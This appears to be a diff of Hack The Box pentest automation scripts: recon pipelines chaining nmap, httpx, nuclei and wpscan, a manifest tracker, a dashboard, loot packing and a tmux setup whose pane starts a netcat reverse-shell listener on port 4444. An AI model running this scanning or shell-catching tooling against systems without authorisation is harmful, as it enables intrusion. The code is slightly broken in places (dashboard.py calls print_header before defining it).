if [[ -n "${ports:-}" ]]; then
# Guess HTTP(S) ports and probe scheme
http_ports=(80 81 88 443 3000 5000 8000 8008 8080 8081 8443 8888 9000)
for p in ${ports//,/ }; do
for hp in "${http_ports[@]}"; do
if [[ "$p" == "$hp" ]]; then
for scheme in http https; do
code=$(curl -sk -o /dev/null -m 4 -w "%{http_code}" "$scheme://$target:$p/" || true)
if [[ "$code" != "000" ]]; then
echo "[+] Web detected: $scheme://$target:$p/ (code=$code)" | tee -a "$log" "$summary"
bin/web/dirbuster.sh "$scheme://$target:$p/" || true
break
fi
done
fi
done
done
fi
echo "[+] Kicking off full TCP (-p-) and targeted sC+sV" | tee -a "$log"
bin/nmap_full.sh "$target" --rate 5000 | tee -a "$log" || true
if [[ $do_udp -eq 1 ]]; then
echo "[+] Kicking off UDP top 200" | tee -a "$log"
bin/nmap_udp.sh "$target" --top 200 | tee -a "$log" || true
fi
echo "[+] Auto recon done. Summary: $summary" | tee -a "$log"

12
bin/automation/cleanup_scans.sh Executable file
View File

@@ -0,0 +1,12 @@
#!/usr/bin/env bash
set -euo pipefail
dir=${1:-${OUTDIR:-scans}}
days=${2:-7}
force=${3:-}
[[ ! -d "$dir" ]] && { echo "Usage: $(basename "$0") [dir] [days] [--force]" >&2; exit 1; }
echo "[+] Pruning files older than $days days in $dir"
[[ "${force:-}" != "--force" ]] && { read -r -p "Proceed? [y/N] " ans; [[ "$ans" == "y" || "$ans" == "Y" ]] || exit 0; }
find "$dir" -type f -mtime +"$days" -print -delete
echo "[+] Done"

164
bin/automation/dashboard.py Executable file
View File

@@ -0,0 +1,164 @@
#!/usr/bin/env python3
import os, json, sys, glob, datetime
def load_manifest(path):
try:
with open(path,'r') as f:
return json.load(f)
except Exception:
return None
def status_symbol(s, color=True):
sym = {'ok':'OK','running':'..','fail':'XX'}.get(s, '--')
if not color or not sys.stdout.isatty():
return sym
colors = {'ok':'\033[32m','running':'\033[33m','fail':'\033[31m'}
reset='\033[0m'
return f"{colors.get(s,'')}{sym}{reset}"
def sev_bar(sev_map, total, width=20, color=True):
if not total or total == 0: return '-'*width
order=['critical','high','medium','low']
codes={'critical':'\033[41m','high':'\033[45m','medium':'\033[43m','low':'\033[42m'}
bar=''
filled=0
for k in order:
n=int((sev_map.get(k,0)/total)*width)
if n>0:
seg=''*n
if color and sys.stdout.isatty():
bar+=codes.get(k,'')+seg+'\033[0m'
else:
bar+=seg
filled+=n
if filled<width:
bar+=' '*(width-filled)
return bar
color = True
compact = False
fancy = True
if '--no-color' in sys.argv:
color = False
if '--compact' in sys.argv:
compact = True
if '--no-fancy' in sys.argv:
fancy = False
if '--fancy' in sys.argv:
fancy = True
root = os.environ.get('HTB_ROOT', os.getcwd())
targets_dir = os.path.join(root,'targets')
manifests = glob.glob(os.path.join(targets_dir,'*','manifest.json'))
rows=[]
# Aggregates for badges/header
agg = {
'targets': 0,
'completed': 0,
'pending': 0,
'sev': {'critical':0,'high':0,'medium':0,'low':0}
}
for m in manifests:
target=os.path.basename(os.path.dirname(m))
data=load_manifest(m) or {}
created=data.get('created_at','')
last=data.get('last_pipeline','')
urls=len(data.get('urls',[])) if isinstance(data.get('urls'), list) else 0
tasks=data.get('tasks',{})
agg['targets'] += 1
# Summaries
sev_str=''
tech_str=''
httpx_meta=(tasks.get('httpx') or {}).get('meta') or {}
nuclei_meta=(tasks.get('nuclei') or {}).get('meta') or {}
try:
if 'httpx_summary' in httpx_meta and os.path.isfile(httpx_meta['httpx_summary']):
with open(httpx_meta['httpx_summary'],'r') as f:
s=json.load(f)
tech=s.get('tech') or {}
top=sorted(tech.items(), key=lambda x: x[1], reverse=True)[:3]
tech_str=', '.join(f"{k}:{v}" for k,v in top)
except Exception:
pass
sev_map={}
sev_total=0
try:
if 'nuclei_summary' in nuclei_meta and os.path.isfile(nuclei_meta['nuclei_summary']):
with open(nuclei_meta['nuclei_summary'],'r') as f:
s=json.load(f)
sev=(s.get('by_severity') or {})
sev_map={k:int(sev[k]) for k in sev}; sev_total=int(s.get('total',0) or 0)
sev_str=' '.join(f"{k[0]}:{sev_map.get(k,0)}" for k in ['critical','high','medium','low'] if sev_map.get(k))
for k in ['critical','high','medium','low']:
agg['sev'][k] += int(sev_map.get(k,0))
except Exception:
pass
# Durations
def dur(task):
t=tasks.get(task) or {}
meta=t.get('meta') or {}
if 'elapsed_sec' in meta:
return str(meta['elapsed_sec'])
# fallback compute
try:
a=t.get('started_at'); b=t.get('finished_at')
if a and b:
da=datetime.datetime.strptime(a,'%Y-%m-%d %H:%M:%S')
db=datetime.datetime.strptime(b,'%Y-%m-%d %H:%M:%S')
return str(int((db-da).total_seconds()))
except Exception:
pass
return '-'
row=[target, created, last, str(urls),
status_symbol(tasks.get('dns',{}).get('status'), color=color)+'('+dur('dns')+'s)',
status_symbol(tasks.get('httpx',{}).get('status'), color=color)+'('+dur('httpx')+'s)',
status_symbol(tasks.get('nuclei',{}).get('status'), color=color)+'('+dur('nuclei')+'s)',
status_symbol(tasks.get('techroute',{}).get('status'), color=color)+'('+dur('techroute')+'s)',
status_symbol(tasks.get('wpscan',{}).get('status'), color=color)+'('+dur('wpscan')+'s)',
sev_str or '-', tech_str or '-', sev_bar(sev_map, sev_total, color=color)]
rows.append(row)
fp = (tasks.get('full_pipeline') or {}).get('status')
if fp == 'ok':
agg['completed'] += 1
else:
agg['pending'] += 1
if '--json' in sys.argv:
out=[]
for r in rows:
out.append({'target':r[0],'created_at':r[1],'last_pipeline':r[2],'urls':int(r[3]),'tasks':{'dns':r[4],'httpx':r[5],'nuclei':r[6],'techroute':r[7],'wpscan':r[8]}})
print(json.dumps(out, indent=2))
sys.exit(0)
if compact:
headers=['target','urls','dns','httpx','nuclei','tech','wp','sev','bar']
print_header()
print(' | '.join(headers))
print('-' * 72)
for r in sorted(rows, key=lambda x: x[0]):
# r indices: 0 tgt, 3 urls, 4 dns,5 httpx,6 nuclei,7 tech,8 wp,9 sev,11 bar
out=[r[0], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[11]]
print(' | '.join(out))
else:
headers=['target','created','last','urls','dns','httpx','nuclei','tech','wp','sev','top-techs','bar']
print_header()
print(' | '.join(headers))
print('-' * 72)
for r in sorted(rows, key=lambda x: x[0]):
print(' | '.join(r))
def print_header():
if not fancy or compact or not sys.stdout.isatty():
return
# Build ASCII header
t = agg['targets']; c = agg['completed']; p = agg['pending']
s = agg['sev']
title = f" Pentest Dashboard — targets:{t} completed:{c} pending:{p} "
line = '+' + '-'*(len(title)) + '+'
sev_line = f" severities — C:{s['critical']} H:{s['high']} M:{s['medium']} L:{s['low']} "
sev_bar = sev_line
print(line)
print('|' + title + '|')
print('|' + sev_bar + '|')
print(line)

192
bin/automation/full_pipeline.sh Executable file
View File

@@ -0,0 +1,192 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage: $(basename "$0") <domain|hosts.txt> [--unsafe] [--resume] [--force]
Pipeline: DNS subenum (if domain) -> httpx (balanced) -> nuclei (auto sev) -> tech route (nuclei by tech) -> optional wpscan.
Outputs to OUTDIR and updates manifest for TARGET (settarget recommended). With --resume (default), completed steps are skipped based on manifest.
USAGE
exit 1
}
in=${1:-}
[[ -z "$in" ]] && usage
unsafe=0
resume=1
[[ ${2:-} == "--unsafe" ]] && unsafe=1
for a in "$@"; do
case "$a" in
--resume) resume=1;;
--force) resume=0;;
esac
done
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
hosts_file="$in"
domain=""
if [[ ! -f "$in" ]]; then
domain="$in"
hosts_file="$outdir/subs_${domain}_${ts}.txt"
if [[ $resume -eq 1 && -n "${TARGET:-}" ]]; then
if bin/automation/manifest.py taskstatus "$TARGET" dns >/dev/null 2>&1; then :; fi
if bin/automation/manifest.py taskstatus "$TARGET" dns >/dev/null 2>&1 && [[ $? -eq 0 ]]; then
echo "[=] Resume: skipping DNS (already ok)"
else
echo "[+] DNS: subenum.sh $domain"
bin/automation/manifest.py task "$TARGET" dns start
_t0=$(date +%s)
if command -v subenum.sh >/dev/null 2>&1; then
subenum.sh "$domain" | tee "$hosts_file"
else
bin/dns/subenum.sh "$domain" | tee "$hosts_file"
fi
_t1=$(date +%s); _dt=$((_t1-_t0))
bin/automation/manifest.py task "$TARGET" dns ok "{\"subs_file\": \"$hosts_file\", \"elapsed_sec\": $_dt}"
fi
else
echo "[+] DNS: subenum.sh $domain"
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" dns start
_t0=$(date +%s)
if command -v subenum.sh >/dev/null 2>&1; then
subenum.sh "$domain" | tee "$hosts_file"
else
bin/dns/subenum.sh "$domain" | tee "$hosts_file"
fi
_t1=$(date +%s); _dt=$((_t1-_t0))
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" dns ok "{\"subs_file\": \"$hosts_file\", \"elapsed_sec\": $_dt}"
fi
fi
if [[ $resume -eq 1 && -n "${TARGET:-}" ]]; then
bin/automation/manifest.py taskstatus "$TARGET" httpx >/dev/null 2>&1
if [[ $? -eq 0 ]]; then
echo "[=] Resume: skipping HTTPX (already ok)"
else
echo "[+] HTTPX balanced probe"
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" httpx start
_t0=$(date +%s)
bin/web/httpx_presets.sh balanced "$hosts_file" | tee "$outdir/httpx_${ts}.txt"
cut -d ' ' -f1 "$outdir/httpx_${ts}.txt" | sort -u > "$outdir/urls_${ts}.txt"
# JSON evidence for richer dashboard (resume)
httpx -silent -l "$hosts_file" -ports 80,81,88,443,3000,5000,7001,7002,8000,8008,8080,8081,8088,8443,8888,9000 -tech-detect -json > "$outdir/httpx_${ts}.json"
python3 - "$outdir/httpx_${ts}.json" > "$outdir/httpx_${ts}.summary.json" <<'PY'
import sys, json, collections
tech=collections.Counter(); urls=0
with open(sys.argv[1],'r',errors='ignore') as f:
for line in f:
try:
o=json.loads(line); urls+=1
for t in o.get('technologies',[]) or []:
tech[t.lower()]+=1
except: pass
print(json.dumps({'urls':urls,'tech':tech}, default=lambda o:o, indent=2))
PY
urls_count=$(wc -l < "$outdir/urls_${ts}.txt" | tr -d ' ')
_t1=$(date +%s); _dt=$((_t1-_t0))
bin/automation/manifest.py task "$TARGET" httpx ok "{\"urls\": $urls_count, \"urls_file\": \"$outdir/urls_${ts}.txt\", \"httpx_json\": \"$outdir/httpx_${ts}.json\", \"httpx_summary\": \"$outdir/httpx_${ts}.summary.json\", \"elapsed_sec\": $_dt}"
fi
else
echo "[+] HTTPX balanced probe"
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" httpx start
_t0=$(date +%s)
bin/web/httpx_presets.sh balanced "$hosts_file" | tee "$outdir/httpx_${ts}.txt"
cut -d ' ' -f1 "$outdir/httpx_${ts}.txt" | sort -u > "$outdir/urls_${ts}.txt"
# JSON evidence for richer dashboard
httpx -silent -l "$hosts_file" -ports 80,81,88,443,3000,5000,7001,7002,8000,8008,8080,8081,8088,8443,8888,9000 -tech-detect -json > "$outdir/httpx_${ts}.json"
# Summarize tech counts
python3 - "$outdir/httpx_${ts}.json" > "$outdir/httpx_${ts}.summary.json" <<'PY'
import sys, json, collections
tech=collections.Counter(); urls=0
with open(sys.argv[1],'r',errors='ignore') as f:
for line in f:
try:
o=json.loads(line); urls+=1
for t in o.get('technologies',[]) or []:
tech[t.lower()]+=1
except: pass
print(json.dumps({'urls':urls,'tech':tech}, default=lambda o:o, indent=2))
PY
_t1=$(date +%s); _dt=$((_t1-_t0))
[[ -n "${TARGET:-}" ]] && { urls_count=$(wc -l < "$outdir/urls_${ts}.txt" | tr -d ' '); bin/automation/manifest.py task "$TARGET" httpx ok "{\"urls\": $urls_count, \"urls_file\": \"$outdir/urls_${ts}.txt\", \"httpx_json\": \"$outdir/httpx_${ts}.json\", \"httpx_summary\": \"$outdir/httpx_${ts}.summary.json\", \"elapsed_sec\": $_dt}"; }
fi
if [[ $resume -eq 1 && -n "${TARGET:-}" ]]; then
bin/automation/manifest.py taskstatus "$TARGET" nuclei >/dev/null 2>&1
if [[ $? -eq 0 ]]; then
echo "[=] Resume: skipping nuclei (already ok)"
else
echo "[+] Nuclei (auto severity)"
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" nuclei start
_t0=$(date +%s)
bin/web/httpx_to_nuclei.sh "$outdir/urls_${ts}.txt" | tee "$outdir/nuclei_pipeline_${ts}.log"
nucjson=$(grep -oE 'NUCLEI_JSON: .*' "$outdir/nuclei_pipeline_${ts}.log" | sed 's/NUCLEI_JSON: //')
nucsum=$(grep -oE 'NUCLEI_SUMMARY: .*' "$outdir/nuclei_pipeline_${ts}.log" | sed 's/NUCLEI_SUMMARY: //')
_t1=$(date +%s); _dt=$((_t1-_t0))
if [[ -n "$nucjson" ]]; then
bin/automation/manifest.py task "$TARGET" nuclei ok "{\"log\": \"$outdir/nuclei_pipeline_${ts}.log\", \"nuclei_json\": \"$nucjson\", \"nuclei_summary\": \"$nucsum\", \"elapsed_sec\": $_dt}"
else
bin/automation/manifest.py task "$TARGET" nuclei ok "{\"log\": \"$outdir/nuclei_pipeline_${ts}.log\", \"elapsed_sec\": $_dt}"
fi
fi
else
echo "[+] Nuclei (auto severity)"
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" nuclei start
_t0=$(date +%s)
bin/web/httpx_to_nuclei.sh "$outdir/urls_${ts}.txt" | tee "$outdir/nuclei_pipeline_${ts}.log"
# Capture JSON and counts if produced
nucjson=$(grep -oE 'NUCLEI_JSON: .*' "$outdir/nuclei_pipeline_${ts}.log" | sed 's/NUCLEI_JSON: //')
nucsum=$(grep -oE 'NUCLEI_SUMMARY: .*' "$outdir/nuclei_pipeline_${ts}.log" | sed 's/NUCLEI_SUMMARY: //')
if [[ -n "${TARGET:-}" ]]; then
_t1=$(date +%s); _dt=$((_t1-_t0))
if [[ -n "$nucjson" ]]; then
bin/automation/manifest.py task "$TARGET" nuclei ok "{\"log\": \"$outdir/nuclei_pipeline_${ts}.log\", \"nuclei_json\": \"$nucjson\", \"nuclei_summary\": \"$nucsum\", \"elapsed_sec\": $_dt}"
else
bin/automation/manifest.py task "$TARGET" nuclei ok "{\"log\": \"$outdir/nuclei_pipeline_${ts}.log\", \"elapsed_sec\": $_dt}"
fi
fi
fi
if [[ $resume -eq 1 && -n "${TARGET:-}" ]]; then
bin/automation/manifest.py taskstatus "$TARGET" techroute >/dev/null 2>&1
if [[ $? -eq 0 ]]; then
echo "[=] Resume: skipping tech route (already ok)"
else
echo "[+] Tech route"
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" techroute start
_t0=$(date +%s)
bin/web/httpx_tech_route.py "$outdir/urls_${ts}.txt" | tee "$outdir/tech_route_${ts}.log"
_t1=$(date +%s); _dt=$((_t1-_t0))
bin/automation/manifest.py task "$TARGET" techroute ok "{\"log\": \"$outdir/tech_route_${ts}.log\", \"elapsed_sec\": $_dt}"
fi
else
echo "[+] Tech route"
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" techroute start
_t0=$(date +%s)
bin/web/httpx_tech_route.py "$outdir/urls_${ts}.txt" | tee "$outdir/tech_route_${ts}.log"
_t1=$(date +%s); _dt=$((_t1-_t0))
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" techroute ok "{\"log\": \"$outdir/tech_route_${ts}.log\", \"elapsed_sec\": $_dt}"
fi
if grep -qi wordpress "$outdir/httpx_${ts}.txt" && command -v wpscan >/dev/null 2>&1; then
echo "[+] WordPress detected; running wpscan_quick on first few URLs"
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" wpscan start
_t0=$(date +%s)
head -n 5 "$outdir/urls_${ts}.txt" | while read -r u; do
if echo "$u" | grep -qi 'http'; then bin/web/wpscan_quick.sh "$u" | tee -a "$outdir/wpscan_${ts}.log"; fi
done
_t1=$(date +%s); _dt=$((_t1-_t0))
[[ -n "${TARGET:-}" ]] && bin/automation/manifest.py task "$TARGET" wpscan ok "{\"log\": \"$outdir/wpscan_${ts}.log\", \"elapsed_sec\": $_dt}"
fi
if [[ -n "$domain" && -n "${TARGET:-}" ]]; then
# Update manifest for this target
bin/automation/manifest.py init "$TARGET" >/dev/null || true
bin/automation/manifest.py addlist "$TARGET" urls "$outdir/urls_${ts}.txt"
bin/automation/manifest.py set "$TARGET" last_pipeline "$ts"
fi
echo "[+] Full pipeline complete. OUTDIR=$outdir"

10
bin/automation/loot_pack.sh Executable file
View File

@@ -0,0 +1,10 @@
#!/usr/bin/env bash
set -euo pipefail
dir=${1:-${PWD}}
[[ ! -d "$dir" ]] && { echo "Usage: $(basename "$0") [dir]" >&2; exit 1; }
ts=$(date +%Y%m%d_%H%M%S)
name="loot_${ts}.tar.gz"
tar --exclude='*.pcap' --exclude='node_modules' -czf "$name" -C "$dir" .
echo "[+] Packed $dir into $name"

121
bin/automation/manifest.py Executable file
View File

@@ -0,0 +1,121 @@
#!/usr/bin/env python3
import os, sys, json, time
HELP = """Usage: manifest.py <command> <target> [args]
Commands:
init <target> Initialize manifest for target
set <target> <key> <value> Set a string value
addlist <target> <key> <file|items> Append items (comma/list/file) to a list key
show <target> Print manifest JSON
task <target> <name> start|ok|fail [meta-json]
get <target> <key> Print key if exists
taskstatus <target> <name> Print status; exit 0 if ok, 2 if running, 1 otherwise
taskreset <target> <name> Reset/remove a task entry
Manifest path: HTB_ROOT/targets/<target>/manifest.json
"""
def mpath(root, target):
return os.path.join(root, 'targets', target, 'manifest.json')
def load(path):
if os.path.isfile(path):
with open(path,'r') as f: return json.load(f)
return {}
def save(path, data):
os.makedirs(os.path.dirname(path), exist_ok=True)
with open(path,'w') as f: json.dump(data, f, indent=2)
def as_list(arg):
if os.path.isfile(arg):
with open(arg,'r',errors='ignore') as f:
return [l.strip() for l in f if l.strip()]
if ',' in arg:
return [x.strip() for x in arg.split(',') if x.strip()]
return [arg]
def main():
if len(sys.argv) < 3:
print(HELP); sys.exit(1)
cmd = sys.argv[1]
target = sys.argv[2]
root = os.environ.get('HTB_ROOT', os.getcwd())
path = mpath(root, target)
data = load(path)
if cmd == 'init':
if not data:
data = {'target': target, 'created_at': time.strftime('%Y-%m-%d %H:%M:%S'), 'scans': {}, 'urls': [], 'tech': {}, 'notes': [], 'loot': [], 'tasks': {}}
save(path, data)
print(path)
elif cmd == 'set' and len(sys.argv) >= 5:
key, value = sys.argv[3], sys.argv[4]
data[key] = value
save(path, data)
elif cmd == 'addlist' and len(sys.argv) >= 5:
key, items = sys.argv[3], as_list(sys.argv[4])
if key not in data or not isinstance(data.get(key), list): data[key] = []
for i in items:
if i not in data[key]: data[key].append(i)
save(path, data)
elif cmd == 'show':
print(json.dumps(data, indent=2))
elif cmd == 'get' and len(sys.argv) >= 4:
key = sys.argv[3]
if key in data:
val = data[key]
if isinstance(val, (dict, list)):
print(json.dumps(val, indent=2))
else:
print(val)
sys.exit(0)
else:
sys.exit(1)
elif cmd == 'task' and len(sys.argv) >= 5:
name = sys.argv[3]
action = sys.argv[4]
meta = {}
if len(sys.argv) >= 6:
try:
meta = json.loads(sys.argv[5])
except Exception:
meta = {'raw': sys.argv[5]}
tasks = data.setdefault('tasks', {})
t = tasks.setdefault(name, {})
now = time.strftime('%Y-%m-%d %H:%M:%S')
if action == 'start':
t['status'] = 'running'
t['started_at'] = now
elif action == 'ok':
t['status'] = 'ok'
t['finished_at'] = now
elif action == 'fail':
t['status'] = 'fail'
t['finished_at'] = now
if meta:
t['meta'] = {**t.get('meta', {}), **meta}
tasks[name] = t
data['tasks'] = tasks
save(path, data)
print(json.dumps(t, indent=2))
elif cmd == 'taskstatus' and len(sys.argv) >= 4:
name = sys.argv[3]
status = data.get('tasks', {}).get(name, {}).get('status')
print(status or 'none')
if status == 'ok':
sys.exit(0)
elif status == 'running':
sys.exit(2)
else:
sys.exit(1)
elif cmd == 'taskreset' and len(sys.argv) >= 4:
name = sys.argv[3]
if 'tasks' in data and name in data['tasks']:
del data['tasks'][name]
save(path, data)
print('reset')
else:
print(HELP); sys.exit(1)
if __name__ == '__main__':
main()

25
bin/automation/notes_attach.sh Executable file
View File

@@ -0,0 +1,25 @@
#!/usr/bin/env bash
set -euo pipefail
target=${1:-${TARGET:-}}
[[ -z "$target" ]] && { echo "Usage: $(basename "$0") <target> (or set TARGET)" >&2; exit 1; }
root=${HTB_ROOT:-$PWD}
dir="$root/targets/$target"
notes="$dir/notes.md"
scandir="$dir/scans"
[[ -f "$notes" ]] || { echo "[!] $notes not found. Run notes_init.sh first." >&2; exit 1; }
{
echo "\n## Artifacts Summary ($(date +%F\ %T))"
if [[ -d "$scandir" ]]; then
echo "\n### Scans"
find "$scandir" -maxdepth 1 -type f -printf "- %f\n" 2>/dev/null || ls -1 "$scandir" | sed 's/^/- /'
else
echo "- No scans directory found"
fi
} >> "$notes"
echo "[+] Appended artifacts summary to $notes"

58
bin/automation/notes_init.sh Executable file
View File

@@ -0,0 +1,58 @@
#!/usr/bin/env bash
set -euo pipefail
target=${1:-${TARGET:-}}
[[ -z "$target" ]] && { echo "Usage: $(basename "$0") <target> (or set TARGET)" >&2; exit 1; }
root=${HTB_ROOT:-$PWD}
dir="$root/targets/$target"
mkdir -p "$dir/scans" "$dir/loot" "$dir/www" "$dir/exploits"
notes="$dir/notes.md"
if [[ -f "$notes" ]]; then
echo "[!] $notes exists. Not overwriting." >&2
exit 1
fi
cat > "$notes" <<'MD'
# Engagement Notes
- Target: TARGET_PLACEHOLDER
- Date: DATE_PLACEHOLDER
## Scope / Access
- VPN:
- Auth:
## Recon Summary
- Hosts:
- Open Ports:
- Services:
## Web
- URLs:
- Findings:
## Creds / Keys
-
## Exploitation Plan
-
## Post-Exploitation
- Proofs:
- Loot:
## Artifacts
- Scans directory contains `.nmap`, `.gnmap`, `.xml`, and tool outputs.
MD
# In-place replace placeholders (BSD/GNU sed compatible handling)
if sed --version >/dev/null 2>&1; then
sed -i -e "s/TARGET_PLACEHOLDER/$target/g" -e "s/DATE_PLACEHOLDER/$(date +%F)/g" "$notes"
else
sed -i '' -e "s/TARGET_PLACEHOLDER/$target/g" -e "s/DATE_PLACEHOLDER/$(date +%F)/g" "$notes"
fi
echo "[+] Created $notes"

View File

@@ -0,0 +1,14 @@
#!/usr/bin/env bash
set -euo pipefail
file=${1:-}
[[ -z "$file" || ! -f "$file" ]] && { echo "Usage: $(basename "$0") <.gnmap|.nmap>" >&2; exit 1; }
if [[ "$file" == *.gnmap ]]; then
ports=$(grep -oE "/[0-9]+/open" "$file" | cut -d/ -f2 | sort -un | paste -sd, -)
else
ports=$(grep -oE " [0-9]+/tcp +open" "$file" | awk '{print $1}' | cut -d/ -f1 | sort -un | paste -sd, -)
fi
echo "$ports"

15
bin/automation/proxy_toggle.sh Executable file
View File

@@ -0,0 +1,15 @@
#!/usr/bin/env bash
set -euo pipefail
cmd=${1:-}
url=${2:-http://127.0.0.1:8080}
case "$cmd" in
on)
export HTTP_PROXY="$url" HTTPS_PROXY="$url" http_proxy="$url" https_proxy="$url"
echo "[+] Proxy ON => $url";;
off)
unset HTTP_PROXY HTTPS_PROXY http_proxy https_proxy
echo "[+] Proxy OFF";;
*) echo "Usage: $(basename "$0") on|off [http://host:port]" >&2; exit 1;;
esac

View File

@@ -0,0 +1,34 @@
#!/usr/bin/env python3
import sys,re
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <file1.gnmap> [file2.gnmap ...]", file=sys.stderr)
sys.exit(1)
ports_by_host = {}
services_by_host = {}
for path in sys.argv[1:]:
try:
with open(path, 'r', errors='ignore') as f:
for line in f:
if 'Ports:' not in line: continue
m = re.search(r'^Host: ([^\s]+)', line)
if not m: continue
host = m.group(1)
ports = re.findall(r'(\d+)/(tcp|udp)/open/([^/,]*)', line)
for port, proto, service in ports:
ports_by_host.setdefault(host, set()).add(f"{port}/{proto}")
if service:
services_by_host.setdefault(host, set()).add(f"{service}:{port}/{proto}")
except IOError:
print(f"[!] Could not read {path}", file=sys.stderr)
for host in sorted(ports_by_host):
portlist = ','.join(sorted(ports_by_host[host], key=lambda x: (x.split('/')[1], int(x.split('/')[0]))))
print(f"{host}: {portlist}")
if host in services_by_host:
print(" services:")
for s in sorted(services_by_host[host]):
print(f" - {s}")

31
bin/automation/resume_all.py Executable file
View File

@@ -0,0 +1,31 @@
#!/usr/bin/env python3
import os, json, glob, subprocess
root = os.environ.get('HTB_ROOT', os.getcwd())
targets_dir = os.path.join(root, 'targets')
def load(path):
try:
with open(path,'r') as f:
return json.load(f)
except Exception:
return None
manifests = glob.glob(os.path.join(targets_dir, '*', 'manifest.json'))
for m in manifests:
target = os.path.basename(os.path.dirname(m))
data = load(m) or {}
fp = data.get('tasks', {}).get('full_pipeline', {})
status = fp.get('status')
arg = fp.get('meta', {}).get('input')
if status == 'ok':
print(f"[=] {target}: full_pipeline already ok")
continue
if not arg:
print(f"[!] {target}: no input stored in manifest; skipping")
continue
env = os.environ.copy()
env['TARGET'] = target
print(f"[>] Resuming {target} with agent full {arg}")
subprocess.call(["bin/ai/agent_orchestrator.py","full",arg], env=env)

94
bin/automation/tech_actions.py Executable file
View File

@@ -0,0 +1,94 @@
#!/usr/bin/env python3
import os, sys, json
HELP = """Usage: tech_actions.py <target> [--run]
Reads targets/<target>/manifest.json, looks at httpx_summary techs, and prints suggested next-step commands.
With --run, executes the suggestions sequentially (best-effort).
"""
def load_manifest(root, target):
path=os.path.join(root,'targets',target,'manifest.json')
try:
with open(path,'r') as f:
return json.load(f)
except Exception:
return {}
if len(sys.argv) < 2:
print(HELP, file=sys.stderr); sys.exit(1)
target=sys.argv[1]
run=('--run' in sys.argv)
root=os.environ.get('HTB_ROOT', os.getcwd())
outdir=os.environ.get('OUTDIR', os.path.join(root,'targets',target,'scans'))
data=load_manifest(root, target)
tasks=(data.get('tasks') or {})
httpx_meta=(tasks.get('httpx') or {}).get('meta') or {}
nuclei_meta=(tasks.get('nuclei') or {}).get('meta') or {}
summary_path=httpx_meta.get('httpx_summary')
if not summary_path or not os.path.isfile(summary_path):
print(f"[!] No httpx_summary found for {target}", file=sys.stderr); sys.exit(2)
summary=json.load(open(summary_path))
tech=summary.get('tech') or {}
if not tech:
print(f"[!] No technologies found in summary", file=sys.stderr); sys.exit(3)
def suggest_for(tech):
m={
'wordpress': [f"bin/web/httpx_tech_route.py {data.get('tasks').get('httpx',{}).get('meta',{}).get('urls_file','urls.txt')} --tech wordpress --severity medium,high,critical --wpscan --wpscan-limit 5"],
'drupal': ["bin/web/droopescan_quick.sh URL"],
'joomla': ["bin/web/joomscan_quick.sh URL"],
'jenkins': ["bin/web/jenkins_quick.sh URL"],
'sonarqube': ["bin/web/sonarqube_quick.sh URL"],
'magento': ["bin/web/magento_quick.sh URL"],
'jira': ["bin/web/jira_quick.sh URL"],
'confluence': ["bin/web/confluence_quick.sh URL"],
'gitlab': ["bin/web/httpx_tech_route.py URLS --tech gitlab"],
'grafana': ["bin/web/httpx_tech_route.py URLS --tech grafana"],
'kibana': ["bin/web/httpx_tech_route.py URLS --tech kibana"],
'exchange': ["bin/web/httpx_tech_route.py URLS --tech exchange"],
'sharepoint': ["bin/web/httpx_tech_route.py URLS --tech sharepoint"],
}
return m.get(tech, [f"bin/web/httpx_tech_route.py URLS --tech {tech}"])
print(f"[+] Target: {target}")
urls_file=httpx_meta.get('urls_file','')
top=sorted(tech.items(), key=lambda x: x[1], reverse=True)
for name,count in top[:8]:
print(f"\n# {name} ({count})")
for cmd in suggest_for(name):
c=cmd.replace('URLS', urls_file).replace('URL', '<url>')
print(c)
if run and ' <url>' not in c:
os.system(c)
# Findings-based suggestions (safe-only)
nj=nuclei_meta.get('nuclei_json')
if nj and os.path.isfile(nj):
sev_order={'critical':0,'high':1,'medium':2,'low':3}
tags_index={}
with open(nj,'r',errors='ignore') as f:
for line in f:
try:
o=json.loads(line)
sev=(o.get('info') or {}).get('severity','').lower()
if sev not in ('critical','high'): continue
tags=(o.get('info') or {}).get('tags','')
for t in (tags.split(',') if isinstance(tags,str) else []):
t=t.strip().lower();
if not t: continue
tags_index.setdefault(t,0); tags_index[t]+=1
except Exception:
pass
if tags_index:
print("\n# Findings-based next steps (high/critical)")
for t,cnt in sorted(tags_index.items(), key=lambda x: -x[1])[:10]:
if t in ('wordpress','wp'): print(f"bin/web/httpx_tech_route.py {urls_file} --tech wordpress --wpscan --wpscan-limit 5")
elif t in ('jenkins',): print("bin/web/jenkins_quick.sh <url>")
elif t in ('confluence',): print("bin/web/confluence_quick.sh <url>")
elif t in ('jira',): print("bin/web/jira_quick.sh <url>")
elif t in ('drupal',): print("bin/web/droopescan_quick.sh <url>")
elif t in ('joomla',): print("bin/web/joomscan_quick.sh <url>")
else:
print(f"bin/web/httpx_tech_route.py {urls_file} --tech {t}")

17
bin/automation/tmux_init.sh Executable file
View File

@@ -0,0 +1,17 @@
#!/usr/bin/env bash
set -euo pipefail
session=${1:-htb}
if tmux has-session -t "$session" 2>/dev/null; then
echo "[=] tmux session '$session' exists. Attach with: tmux attach -t $session"
exit 0
fi
tmux new-session -d -s "$session" -n scans
tmux split-window -h -t "$session":0
tmux send-keys -t "$session":0.0 'cd ${HTB_ROOT:-$PWD} && echo scans && ls scans || true' C-m
tmux send-keys -t "$session":0.1 'rlwrap nc -lvnp 4444' C-m
tmux new-window -t "$session":1 -n notes
tmux send-keys -t "$session":1 'notesinit && ${EDITOR:-vim} targets/${TARGET}/notes.md' C-m
tmux new-window -t "$session":2 -n server
tmux send-keys -t "$session":2 'cd www 2>/dev/null || true; http_serve.sh 8000' C-m
